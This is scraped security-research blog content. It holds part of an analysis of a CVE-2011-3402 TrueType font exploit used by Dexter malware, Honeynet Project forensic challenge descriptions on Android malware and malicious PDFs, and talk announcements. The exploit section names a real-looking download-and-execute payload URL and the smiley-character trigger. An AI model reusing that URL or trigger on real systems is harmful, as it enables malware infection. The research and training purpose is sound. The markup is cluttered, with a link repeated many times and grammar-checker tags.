target="_blank"></a><a href="https://media.blackhat.com/bh-eu-12/Lee/bh-eu-12-Lee-GDI_Font_Fuzzing-WP.pdf" target="_blank"></a><a href="https://media.blackhat.com/bh-eu-12/Lee/bh-eu-12-Lee-GDI_Font_Fuzzing-WP.pdf" target="_blank"></a><a href="https://media.blackhat.com/bh-eu-12/Lee/bh-eu-12-Lee-GDI_Font_Fuzzing-WP.pdf" target="_blank"></a><a href="https://media.blackhat.com/bh-eu-12/Lee/bh-eu-12-Lee-GDI_Font_Fuzzing-WP.pdf" target="_blank"></a><a href="https://media.blackhat.com/bh-eu-12/Lee/bh-eu-12-Lee-GDI_Font_Fuzzing-WP.pdf" target="_blank"></a><a href="https://media.blackhat.com/bh-eu-12/Lee/bh-eu-12-Lee-GDI_Font_Fuzzing-WP.pdf" target="_blank"></a><a href="https://media.blackhat.com/bh-eu-12/Lee/bh-eu-12-Lee-GDI_Font_Fuzzing-WP.pdf" target="_blank"></a><a href="https://media.blackhat.com/bh-eu-12/Lee/bh-eu-12-Lee-GDI_Font_Fuzzing-WP.pdf" target="_blank"></a><a href="https://media.blackhat.com/bh-eu-12/Lee/bh-eu-12-Lee-GDI_Font_Fuzzing-WP.pdf" target="_blank"></a><a href="https://media.blackhat.com/bh-eu-12/Lee/bh-eu-12-Lee-GDI_Font_Fuzzing-WP.pdf" target="_blank"></a><a href="https://media.blackhat.com/bh-eu-12/Lee/bh-eu-12-Lee-GDI_Font_Fuzzing-WP.pdf" target="_blank"></a><a href="https://media.blackhat.com/bh-eu-12/Lee/bh-eu-12-Lee-GDI_Font_Fuzzing-WP.pdf" target="_blank"></a><a href="https://media.blackhat.com/bh-eu-12/Lee/bh-eu-12-Lee-GDI_Font_Fuzzing-WP.pdf" target="_blank"></a><a href="https://media.blackhat.com/bh-eu-12/Lee/bh-eu-12-Lee-GDI_Font_Fuzzing-WP.pdf" target="_blank"></a><a href="https://media.blackhat.com/bh-eu-12/Lee/bh-eu-12-Lee-GDI_Font_Fuzzing-WP.pdf" target="_blank"></a><a href="https://media.blackhat.com/bh-eu-12/Lee/bh-eu-12-Lee-GDI_Font_Fuzzing-WP.pdf" target="_blank"></a><a href="https://media.blackhat.com/bh-eu-12/Lee/bh-eu-12-Lee-GDI_Font_Fuzzing-WP.pdf" target="_blank"></a><a href="https://media.blackhat.com/bh-eu-12/Lee/bh-eu-12-Lee-GDI_Font_Fuzzing-WP.pdf" target="_blank"></a><a href="https://media.blackhat.com/bh-eu-12/Lee/bh-eu-12-Lee-GDI_Font_Fuzzing-WP.pdf" target="_blank"></a><a href="https://media.blackhat.com/bh-eu-12/Lee/bh-eu-12-Lee-GDI_Font_Fuzzing-WP.pdf" target="_blank"></a><a href="https://media.blackhat.com/bh-eu-12/Lee/bh-eu-12-Lee-GDI_Font_Fuzzing-WP.pdf" target="_blank">here</a>.<br />
<br />
In order to understand the TTF file format in easy way, 010 Editor's TTF Font template is used. Figure 5.0 showed the TTF Font format inside 010 Editor.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRfyfrAdp1ymJ1iS6jR8iUkJAjFF-b_QdHYIENseqEi2qvEnJGvZGjF0Jk1tKrnGVA0kbShO1EP6wPk6ThtR7SAZShxx2AUs5PyqRZn4tD5VvEz1pbRKe-FHgKeF2ie9n8tWud/s1600/cve_2011-3402_11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="273" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRfyfrAdp1ymJ1iS6jR8iUkJAjFF-b_QdHYIENseqEi2qvEnJGvZGjF0Jk1tKrnGVA0kbShO1EP6wPk6ThtR7SAZShxx2AUs5PyqRZn4tD5VvEz1pbRKe-FHgKeF2ie9n8tWud/s320/cve_2011-3402_11.png" width="320" /></a></div>
<br />
<div style="text-align: center;">
<span style="text-align: justify;">Figure 5.0 showed the TTF Font format inside 010 Editor.</span></div>
<br />
Based on the lclee_vx's presentation, the criteria to trigger the exploit are pretty much the same with the extracted Dexter TTF font. Upon checking further, the <span class="GRcorrect" grphrase="eb30b8e3a3388215bb1ac42a40296c00e8035a2f" grtype="null" id="GRmark_eb30b8e3a3388215bb1ac42a40296c00e8035a2f_shellcode:0">shellcode</span> can be discovered <span class="GRcorrect" grphrase="eb30b8e3a3388215bb1ac42a40296c00e8035a2f" grtype="null" id="GRmark_eb30b8e3a3388215bb1ac42a40296c00e8035a2f_at:1">at</span> FPGM Table. Two <span class="GRcorrect" grphrase="34cb9d1d07e532f787a67ba3e2dc09ed778c22e9" grtype="null" id="GRmark_34cb9d1d07e532f787a67ba3e2dc09ed778c22e9_shellcodes:0">shellcodes</span> is used, once is for ring0 and another one is ring3 <span class="GRcorrect" grphrase="34cb9d1d07e532f787a67ba3e2dc09ed778c22e9" grtype="null" id="GRmark_34cb9d1d07e532f787a67ba3e2dc09ed778c22e9_shellcode:1">shellcode</span>. Ring 0 <span class="GRcorrect" grphrase="0b14b9bef47c1390fee5764b7c0dfdd36ee48258" grtype="null" id="GRmark_0b14b9bef47c1390fee5764b7c0dfdd36ee48258_shellcode:0">shellcode</span> will copy and execute ring 3 <span class="GRcorrect" grphrase="0b14b9bef47c1390fee5764b7c0dfdd36ee48258" grtype="null" id="GRmark_0b14b9bef47c1390fee5764b7c0dfdd36ee48258_shellcode:1">shellcode</span>. Ring 3 <span class="GRcorrect" grphrase="1a6dcf667b71a75d27f346d38ca9345de8817682" grtype="null" id="GRmark_1a6dcf667b71a75d27f346d38ca9345de8817682_shellcode:0">shellcode</span> is to download and execute (download and exec) a binary from this url: http://146.185.235.21/r/f.php?k=4. Figures 6.0 and 7.0 showed part of ring 0 and ring 3 <span class="GRcorrect" grphrase="6c1c80be981020de86cd5e5be964d6dacc010b99" grtype="null" id="GRmark_6c1c80be981020de86cd5e5be964d6dacc010b99_shellcode:0">shellcode</span>, respectively.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhG0qDgGv8_jslWOqupw8hCre5zvFajdt8kI4JEuqOoCoCrSF3Rm_CgT8bmDsEuH9NA4FwCucw4iEeJ0chHUNnbfVFeiK_D8qgSDHftThexaKf1olUBNe97no9Ot_tj6I1Upqc7/s1600/cve_2011-3402_18.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhG0qDgGv8_jslWOqupw8hCre5zvFajdt8kI4JEuqOoCoCrSF3Rm_CgT8bmDsEuH9NA4FwCucw4iEeJ0chHUNnbfVFeiK_D8qgSDHftThexaKf1olUBNe97no9Ot_tj6I1Upqc7/s1600/cve_2011-3402_18.png" /></a></div>
<br />
<div style="text-align: center;">
Figures 6.0 Ring 0 (kernel) <span class="GRcorrect" grphrase="fb5afcfb0903deeeca9a63ac4667c55daa05fee5" grtype="null" id="GRmark_fb5afcfb0903deeeca9a63ac4667c55daa05fee5_shellcode:0">shellcode</span></div>
<div style="text-align: center;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfOz_CRbHu1tr4VfPVvoiUN8DJO0bAXc292QjKG-6KD5NwOri7PujtzOxQs4bHDMVekJ5nTBt0m4t06Nq8VSXyHY5X5unHqLgQUzq4yPCgGTvVRuMv9tn1ELAw2LnVEU06JD3Q/s1600/cve_2011-3402_17.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="348" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfOz_CRbHu1tr4VfPVvoiUN8DJO0bAXc292QjKG-6KD5NwOri7PujtzOxQs4bHDMVekJ5nTBt0m4t06Nq8VSXyHY5X5unHqLgQUzq4yPCgGTvVRuMv9tn1ELAw2LnVEU06JD3Q/s400/cve_2011-3402_17.png" width="400" /></a></div>
<br />
<div style="text-align: center;">
</div>
<div style="text-align: center;">
Figures 7.0 Ring 3 (<span class="GRcorrect" grphrase="bf8b79d6610a6bbb80db5c7810058c58e10afe27" grtype="null" id="GRmark_bf8b79d6610a6bbb80db5c7810058c58e10afe27_userland:0">userland</span>) <span class="GRcorrect" grphrase="bf8b79d6610a6bbb80db5c7810058c58e10afe27" grtype="null" id="GRmark_bf8b79d6610a6bbb80db5c7810058c58e10afe27_shellcode:1">shellcode</span></div>
<div>
<br /></div>
<div style="text-align: center;">
<br /></div>
If we carefully check on the characters supported by the Dexter TTF font are only smiley <span class="GRcorrect" grphrase="1cfe1daa8a573974145204b607bb92f9054f9262" grtype="null" id="GRmark_1cfe1daa8a573974145204b607bb92f9054f9262_chars:1">chars</span> which are ":)". So, in order to trigger the vulnerability, the smiley chars are used inside <<span class="GRcorrect" grphrase="599e5b7cb85ef13c50c58af5688ab54854f56047" grtype="null" id="GRmark_599e5b7cb85ef13c50c58af5688ab54854f56047_div:0">div</span> class=duqu>:)</<span class="GRcorrect" grphrase="599e5b7cb85ef13c50c58af5688ab54854f56047" grtype="null" id="GRmark_599e5b7cb85ef13c50c58af5688ab54854f56047_div:1">div</span>>. Please refer back to Figure 1.0.<br />
<br />
<br /></div>
<div style="text-align: justify;">
<br /></div>
</div>
yomudshttp://www.blogger.com/profile/10660119780422829194noreply@blogger.com2tag:blogger.com,1999:blog-16641472.post-37168908323567909472011-08-04T21:30:00.000-07:002012-11-12T09:40:53.007-08:00Forensic Challenge 9 - "Mobile Malware" <div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
<span style="font-family: inherit;">We did it again, this time, we published a new challenge on Mobile Malware. This is really an awesome challenge for us to work on since we're working with different chapters. This time, Azizan and me, team up with <span style="background-color: white; line-height: 20px;">Franck Guenichot from French Chapter and Matt Erasmus from South Africa Chapter.</span></span></div>
<div style="text-align: justify;">
<span style="background-color: white; line-height: 20px;"><span style="font-family: inherit;"><br /></span></span></div>
<div style="text-align: justify;">
<span style="font-family: inherit;"><span style="line-height: 20px;">Enjoy the challenge!. :)</span></span></div>
<br />
<br />
Here is the description of the challenge posted by the Honeynet Project:<br />
<br />
<br />
<h2 style="background-color: white; color: #494949; font-family: Helvetica, Arial, sans-serif; font-size: 19px; font-weight: normal; line-height: 24px; margin: 0px; padding: 0px;">
Forensic Challenge 9 - "Mobile Malware"</h2>
<div class="node" id="node-751" style="background-color: white; border-bottom-color: rgb(248, 247, 237); border-bottom-style: solid; border-bottom-width: 1px; color: #494949; font-family: Verdana; font-size: 12px; line-height: 20px; margin: -1.5em -26px 1.5em; padding: 1.5em 26px;">
<div class="content" style="margin: 0.6em 0px;">
<div style="margin-bottom: 1.2em; margin-top: 0.6em; padding: 0px;">
<strong>Challenge 9 - Mobile Malware</strong> (provided by Franck Guenichot from French Chapter, Mahmud Ab Rahman and Ahmad Azizan Idris from Malaysia Chapter and Matt Erasmus from South Africa Chapter)</div>
<div style="margin-bottom: 1.2em; margin-top: 0.6em; padding: 0px;">
Please submit your solution using the submission template below by September 30th 2011 at<a href="http://www.honeynet.org/challenge2010" style="color: #00a3db; text-decoration: initial;">http://www.honeynet.org/challenge2010</a>.</div>
<div style="margin-bottom: 1.2em; margin-top: 0.6em; padding: 0px;">
Results will be announced mid October. For any questions and inquiries, please contact forensicchallenge2010@honeynet.org.</div>
<div style="margin-bottom: 1.2em; margin-top: 0.6em; padding: 0px;">
<strong>Skill Level: Intermediate</strong></div>
<div style="margin-bottom: 1.2em; margin-top: 0.6em; padding: 0px;">
With the number of <span class="GRcorrect" grphrase="e290ba7abe0aed68e3228d7a42ce6c78af6c1c3e" grtype="null" id="GRmark_bc78959e430e02b154d801666de60962c2320784_smartphone:0">smartphone</span> users growing exponentially (1.6 billion mobile device units sold in 2010, 19% were <span class="GRcorrect" grphrase="e290ba7abe0aed68e3228d7a42ce6c78af6c1c3e" grtype="null" id="GRmark_bc78959e430e02b154d801666de60962c2320784_smartphones:2">smartphones</span>) mobile devices are becoming an attractive platform for <span class="GRcorrect" grphrase="e290ba7abe0aed68e3228d7a42ce6c78af6c1c3e" grtype="null" id="GRmark_bc78959e430e02b154d801666de60962c2320784_cybercriminals:3">cybercriminals</span>. As a security researcher or enthusiast, you need to know your enemy and be able to defend yourself against these new kinds of threats.</div>
<div style="margin-bottom: 1.2em; margin-top: 0.6em; padding: 0px;">
This challenge offers the exploration of a real <span class="GRcorrect" grphrase="7bf41689fb63755f1eacd3cd43eaca62d91b4597" grtype="null" id="GRmark_7bf41689fb63755f1eacd3cd43eaca62d91b4597_smartphone:0">smartphone</span>, based on a popular OS, after a security incident.<br />You will have to analyze the image of a portion of the file system, extract all that may look suspicious, analyze the threat and finally submit your forensic analysis. From File System recovery to Malware reverse-engineering and PCAP analysis, this challenge will take you to the world of Mobile Malwares.</div>
<div style="margin-bottom: 1.2em; margin-top: 0.6em; padding: 0px;">
<strong>Questions: </strong><br />1. Write an executive summary of this incident (3 pts)<br />2. Provide the phone brand, model, OS name and version (1 pts)<br />3. Extract any suspicious application (if any). Detail your extraction method. Please provide <span class="GRcorrect" grphrase="18100247d8cf8a12aa5df9d5c338e1dd7a54c989" grtype="null" id="GRmark_18100247d8cf8a12aa5df9d5c338e1dd7a54c989_name:0">name</span> and SHA1 for each suspicious app<span class="GRcorrect" grphrase="18100247d8cf8a12aa5df9d5c338e1dd7a54c989" grtype="null" id="GRmark_18100247d8cf8a12aa5df9d5c338e1dd7a54c989_.:1">.</span>(4 pts)<br />4. What permissions are requested by the malware(s)? Why it is suspicious ? (1 pts)<br />5. Please provide a solution/s to quickly identify any suspicious API (please define your suspicious API according to your understanding) (8 pts)<br />6. What is the malware's home server URL and where is it located? Where, in the code, is/are stored the command server(s) URL<span class="GRcorrect" grphrase="421f63682a5273bea3a7759eb55629c6b32cab70" grtype="null" id="GRmark_421f63682a5273bea3a7759eb55629c6b32cab70_(:0">(</span>s<span class="GRcorrect" grphrase="421f63682a5273bea3a7759eb55629c6b32cab70" grtype="null" id="GRmark_421f63682a5273bea3a7759eb55629c6b32cab70_):1">)</span>(4 pts)<br />7. What can you say about the communications model between the malware and its C&C server? (2 pts)<br />8. If encryption was used for the communication, which encryption algorithm was used? What was the key used? Explain how you found it. (4 pts)<br />9. Please draw a graph of the decrypted communication flow, found in the <span class="GRcorrect" grphrase="f659ace71eb86b066a9311b621ae5462935a6167" grtype="null" id="GRmark_f659ace71eb86b066a9311b621ae5462935a6167_pcap:0">pcap</span>, between the malware and the C&C (4 pts)<br />10. What <span class="GRcorrect" grphrase="c37afdb2286fb6a08b1bdec78a91be1f92275652" grtype="null" id="GRmark_c37afdb2286fb6a08b1bdec78a91be1f92275652_personnal:0">personnal</span> informations were leaked during this incident? A special *secret* information was leaked, Explain how and what it was. (2 pts)<br />11. What particular techniques are used by the malware to harden analysis or to evade detection? What unusual behavior can be noticed? (6 pts)<br />12. Provide a <span class="GRcorrect" grphrase="42fe8ff43d2b745479076415dde645df1c1181f5" grtype="null" id="GRmark_42fe8ff43d2b745479076415dde645df1c1181f5_detailled:0">detailled</span> analysis of the malware behavior and features. (10 pts)<br />13. Please provide a method to block (or request permission from Android (similar to UAC concept)) when any suspicious call received from Android (8 pts)</div>
<div style="margin-bottom: 1.2em; margin-top: 0.6em; padding: 0px;">
<strong>Download:</strong></div>
<div style="margin-bottom: 1.2em; margin-top: 0.6em; padding: 0px;">
<a href="http://malphx.free.fr/dotclear/public/fc9files-final.tar.gz" style="color: #00a3db; text-decoration: initial;">fc9files-final<span class="GRcorrect" grphrase="bbd2f78ed74b7c15f53cc3190e2cbbbf38ac5f18" grtype="null" id="GRmark_bbd2f78ed74b7c15f53cc3190e2cbbbf38ac5f18_.:0">.</span>tar<span class="GRcorrect" grphrase="bbd2f78ed74b7c15f53cc3190e2cbbbf38ac5f18" grtype="null" id="GRmark_bbd2f78ed74b7c15f53cc3190e2cbbbf38ac5f18_.:1">.</span><span class="GRcorrect" grphrase="bbd2f78ed74b7c15f53cc3190e2cbbbf38ac5f18" grtype="null" id="GRmark_bbd2f78ed74b7c15f53cc3190e2cbbbf38ac5f18_gz:2">gz</span></a><br />SHA1: dbc378ce1807a4a2459f882b13b4224d0db8fbc7</div>
<div style="margin-bottom: 1.2em; margin-top: 0.6em; padding: 0px;">
The archive contains 2 files:<br />- data.bin: corrupted /data partition image of the phone<br />- <span class="GRcorrect" grphrase="3b128938dc9b73b3772762bc99c793c14b36fe8f" grtype="null" id="GRmark_3b128938dc9b73b3772762bc99c793c14b36fe8f_traffic:0">traffic</span><span class="GRcorrect" grphrase="3b128938dc9b73b3772762bc99c793c14b36fe8f" grtype="null" id="GRmark_3b128938dc9b73b3772762bc99c793c14b36fe8f_.:1">.</span><span class="GRcorrect" grphrase="3b128938dc9b73b3772762bc99c793c14b36fe8f" grtype="null" id="GRmark_3b128938dc9b73b3772762bc99c793c14b36fe8f_pcap:2">pcap</span>: traffic capture of the malware communications.</div>
<div style="margin-bottom: 1.2em; margin-top: 0.6em; padding: 0px;">
This work by Franck Guenichot, Mahmud Ab Rahman, Ahmad Azizan Idris and Matt Erasmus is licensed under a Creative Commons Attribution-NonCommercial-NoDerivs 3.0 Unported License.</div>
</div>
</div>
</div>
yomudshttp://www.blogger.com/profile/10660119780422829194noreply@blogger.com0tag:blogger.com,1999:blog-16641472.post-30546064489529895872011-06-18T23:46:00.000-07:002012-12-05T23:49:57.050-08:00Sneaky PDF will be featured at DEFCON 19<div dir="ltr" style="text-align: left;" trbidi="on">
\0/, My paper on Sneaky PDF is accepted for DEFCON 19. I'll present on how in-the-wild malicious PDF implementing their obfuscation to avoid for detection and making analysis harder. Here is my full abstract:<br />
<br />
<br />
<br />
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace; font-size: large;">Sneaky PDF</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">Being a most prevalent document exchange format on the Internet, Portable Document Format (PDF) is in danger of becoming the main target for client-side attack. With estimation of more than 1.5 million line of code and loaded with huge functionalities, this powerful document format is suffered with several high impact vulnerabilities, allowing attackers to exploit and use it as malware spreading vector.</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">Until now, there are thousands of malicious PDF file spreads with little chances of getting detected.</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">The challenges are obfuscation techniques used by the attackers to hide their malicious activities, hence minimizing detection rate. In order to sustain the survival of malicious PDF file on the Internet, attackers circumvent the analysis process through diverse obfuscation techniques. Obfuscation methods used usually ranges from PDF syntax obfuscation, PDF filtering mechanism, JavaScript obfuscation, and variant from both methods. Because of rapid changes in methods of obfuscation, most antivirus software as well as security tools failed to detect malicious content inside PDF file, thus increasing the number of victims of malicious PDF mischief.</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">In this paper, we study in the obfuscation techniques used inside in-the-wild malicious PDF, how to make it more stealthy and how we can improve analysis on malicious PDF</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Times, Times New Roman, serif;">I'm looking forward to meet old and new faces!. Will be my first time at DEFCON. :)</span></div>
</div>
yomudshttp://www.blogger.com/profile/10660119780422829194noreply@blogger.com0tag:blogger.com,1999:blog-16641472.post-31757406494155243622011-03-27T09:28:00.000-07:002012-11-12T09:41:37.289-08:00Reversing Android Malware And Honeynet Project Workshop<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
I honored by Honeynet Project folks for allowing to present on a new topic "Reverse Engineering Android Malware" for the Honeynet Project Security Workshop in Paris, France last week. My first part of the presentation, covered on introduction into APK, Dalvik and processes involve for Android app development into packaging in details. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
For the second part of the presentation, <span class="GRcorrect" grphrase="be0c5674f3235bed73564c9fe82c831251ca5e79" grtype="null" id="GRmark_be0c5674f3235bed73564c9fe82c831251ca5e79_i:0">i</span> focused on methods and tools for reversing android malware or app. When dealing with reverse engineering android app (or malware), it is an ideal goal to be able to have decompile code in Java (normally), but unfortunately, decompiling is hard!. :). So, an understanding on disassemble code for Dalvik is a good skill to have when dealing with reverse engineering on the Android platform.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The third part the presentation is a few cases studies on various Android <span class="GRcorrect" grphrase="0502f4bbb0bc913336156afa2a0969ca6e09f4e0" grtype="null" id="GRmark_0502f4bbb0bc913336156afa2a0969ca6e09f4e0_malwares:0">malwares</span>. The malware samples are SMS<span class="GRcorrect" grphrase="0502f4bbb0bc913336156afa2a0969ca6e09f4e0" grtype="null" id="GRmark_0502f4bbb0bc913336156afa2a0969ca6e09f4e0_.:1">.</span>Trojon, Geinimi, ADDR and DreamDroid. These are quite interesting samples. I sorted the case study samples from simple to intermediate level of complexity of the <span class="GRcorrect" grphrase="dab87931a09630bd3a308cd43e9531429fb6d368" grtype="null" id="GRmark_dab87931a09630bd3a308cd43e9531429fb6d368_malwares:0">malwares</span>. On Geinimi and DreamDroid, I demoed on how we can perform and reverse engineering on cryptography implemented within the malware samples. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<span class="GRcorrect" grphrase="89dbfc442dd8b3a4cc3b2440457eba2acd7aabd1" grtype="null" id="GRmark_89dbfc442dd8b3a4cc3b2440457eba2acd7aabd1_Honeynet:0">Honeynet</span> Project already released my presentation slide. You can get it from <a href="http://www.honeynet.org/files/HPW2011%20-%20Reversing%20Android%20Malware%20-%20Mahmud%20Ab%20Rahman.pdf" target="_blank">here</a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<<span class="GRcorrect" grphrase="0a25ba5991316bdda4a9b3abcee2106016df28a0" grtype="null" id="GRmark_0a25ba5991316bdda4a9b3abcee2106016df28a0_update:0">update</span>> </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The video for my presentation is published.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
#The First Part of the Presentation</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/8PS47XNwntg?feature=player_embedded' frameborder='0'></iframe></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
#The Second Part of The Presentation</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<object class="BLOGGER-youtube-video" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" data-thumbnail-src="http://3.gvt0.com/vi/AnP_apJlm68/0.jpg" height="266" width="320"><param name="movie" value="http://www.youtube.com/v/AnP_apJlm68&fs=1&source=uds" /><param name="bgcolor" value="#FFFFFF" /><param name="allowFullScreen" value="true" /><embed width="320" height="266" src="http://www.youtube.com/v/AnP_apJlm68&fs=1&source=uds" type="application/x-shockwave-flash" allowfullscreen="true"></embed></object></div>
<div style="text-align: justify;">
<br /></div>
</div>
yomudshttp://www.blogger.com/profile/10660119780422829194noreply@blogger.com0tag:blogger.com,1999:blog-16641472.post-10656676726533401652010-11-01T08:47:00.000-07:002012-11-12T09:42:01.955-08:00Honeynet Project Forensic Challenge on Malicious PDF<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
Ahmad Azizan and <span class="GRspelling" grtype="null">i</span> released a challenge for Honeynet Project Forensic Challenge on our favorite topic, malicious PDF called, "<strong style="background-color: white; color: #494949; font-family: Verdana; font-size: 12px; line-height: 20px;"><a href="http://www.honeynet.org/challenges/2010_6_malicious_pdf" style="color: #0083b0;">Analyzing Malicious Portable Destructive Files</a>". </strong> We implemented a few tricks on making analysis harder inside the PDF file such as JavaScript obfuscations, PDF /Root component, and PDF syntax obfuscation and many more. It will be interesting to see how people will get the wrong <span class="GRcorrect" grphrase="c32b2f4a9f6e1228370bf325fab470afa6027170" grtype="null" id="GRmark_c32b2f4a9f6e1228370bf325fab470afa6027170_shellcode:0">shellcode</span> execution. >;). Good Luck and enjoy the challenge. We are definitely having a lot of fun while working on the challenge.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Please check out the challenge from Honeynet Project Forensic Challenge 6 page <a href="http://www.honeynet.org/challenges/2010_6_malicious_pdf" target="_blank">here</a>.</div>
<br />
<br />
Here is the challenge description:<br />
<br />
<br />
<div style="background-color: white; color: #494949; font-family: Verdana; font-size: 12px; line-height: 20px; margin-bottom: 1.2em; margin-top: 0.6em; padding: 0px;">
<strong>The Challenge:</strong></div>
<div style="background-color: white; color: #494949; font-family: Verdana; font-size: 12px; line-height: 20px; margin-bottom: 1.2em; margin-top: 0.6em; padding: 0px;">
<span class="GRcorrect" grphrase="6033bda792d8847af2c1e04a3a7fe31ede26b566" grtype="null" id="GRmark_6033bda792d8847af2c1e04a3a7fe31ede26b566_PDF format:0">PDF format</span> is the de-facto standard in exchanging documents online. Such popularity, however, has also attracted cyber criminals in spreading malware to unsuspecting users. The ability to generate malicious pdf files to distribute malware is functionality that has been built into many exploit kits. As users are less cautious opening PDF files, the malicious PDF file has become quite a successful attack vector.<br />
<br />
The network traffic captured in <span class="GRcorrect" grphrase="a281749407ccdc8bf75c7eeb9064d239ffc71495" grtype="null" id="GRmark_a281749407ccdc8bf75c7eeb9064d239ffc71495_lala:0">lala</span><span class="GRcorrect" grphrase="a281749407ccdc8bf75c7eeb9064d239ffc71495" grtype="null" id="GRmark_a281749407ccdc8bf75c7eeb9064d239ffc71495_.:1">.</span><span class="GRcorrect" grphrase="a281749407ccdc8bf75c7eeb9064d239ffc71495" grtype="null" id="GRmark_a281749407ccdc8bf75c7eeb9064d239ffc71495_pcap:2">pcap</span> contains network traffic related to a typical malicious PDF file attack, in which <span class="GRcorrect" grphrase="a281749407ccdc8bf75c7eeb9064d239ffc71495" grtype="null" id="GRmark_a281749407ccdc8bf75c7eeb9064d239ffc71495_a:3">a</span> unsuspecting user opens a compromised web page, which redirects the user's web browser to a URL of a malicious PDF file. As the PDF plug-in of the browser opens the PDF, the <span class="GRcorrect" grphrase="346c81bc5c07574bb75212e5b2384d94a59f2450" grtype="null" id="GRmark_346c81bc5c07574bb75212e5b2384d94a59f2450_unpatched:0">unpatched</span> version of Adobe Acrobat Reader is exploited and, as a result, downloads and silently installs malware on the user's machine.</div>
<ol style="background-color: white; color: #494949; font-family: Verdana; font-size: 12px; line-height: 20px;">
<li>How many URL path(s) are involved in this incident? Please list down the URL path(s) found. (1pt)</li>
<li>What code can you find <span class="GRcorrect" grphrase="e0d07667c9d83f6b276a31a5576373071954b05e" grtype="null" id="GRmark_e0d07667c9d83f6b276a31a5576373071954b05e_inside:0">inside</span> the PCAP file? Explain what the code does. (2pts)</li>
<li>What file(s) can you find within the PCAP file? If any files are found, please zip compress into password protected file (password infected) with <span class="GRcorrect" grphrase="9a0eece5b8bc358a114af0c472809705f8ab0987" grtype="null" id="GRmark_9a0eece5b8bc358a114af0c472809705f8ab0987_file name:0">file name</span>: [your email<span class="GRcorrect" grphrase="9a0eece5b8bc358a114af0c472809705f8ab0987" grtype="null" id="GRmark_9a0eece5b8bc358a114af0c472809705f8ab0987_]:1">]</span>_Forensic Challenge 2010 – Challenge 6 – Extracted Files.zip and submit to <a href="http://www.honeynet.org/challenge2010/" style="color: #00a3db; text-decoration: initial;" title="http://www.honeynet.org/challenge2010/">http://www.honeynet.org/challenge2010/</a>. (3pts)</li>
<li>How many object(s) are contained inside the PDF file? (1pt)</li>
<li>Using <span class="GRcorrect" grphrase="fd6267bd1e7a70a37abcf072e41ed9a3a4c913f9" grtype="null" id="GRmark_fd6267bd1e7a70a37abcf072e41ed9a3a4c913f9_PDF dictionary:0">PDF dictionary</span> and object referencing, explain in detail the flow structure of a PDF file. (1pt)</li>
<li>How many filtering schemes are used for the object streams and what are they? Explain how you can decompress the stream. (1pt)</li>
<li>Which object streams might contain malicious content? <span class="GRcorrect" grphrase="891fb427d909a2d5a3c084a57c170f66789a5a72" grtype="null" id="GRmark_891fb427d909a2d5a3c084a57c170f66789a5a72_List the object:0">List the object</span> and explain the obfuscation technique(s) used. (3pts)</li>
<li>What exploit(s) are contained inside the PDF file? Which one that actually runs and triggers the vulnerability(ies)? Please provide some explanation for your answer. (4pts)</li>
<li>Are there any payloads inside the PDF file? If any, list them all and explain what they do. Which payload will be executed? (2pts)</li>
<li>With the understanding of the PDF format structure, please explain how we can enable other exploits to run when the PDF file is opened. (2pts)</li>
</ol>
<div style="background-color: white; color: #494949; font-family: Verdana; font-size: 12px; line-height: 20px; margin-bottom: 1.2em; margin-top: 0.6em; padding: 0px;">
Bonus:</div>
<ol style="background-color: white; color: #494949; font-family: Verdana; font-size: 12px; line-height: 20px;">
<li>Please provide the dot graph of the PDF object’s connectivity inside the PDF file. (1pt)</li>
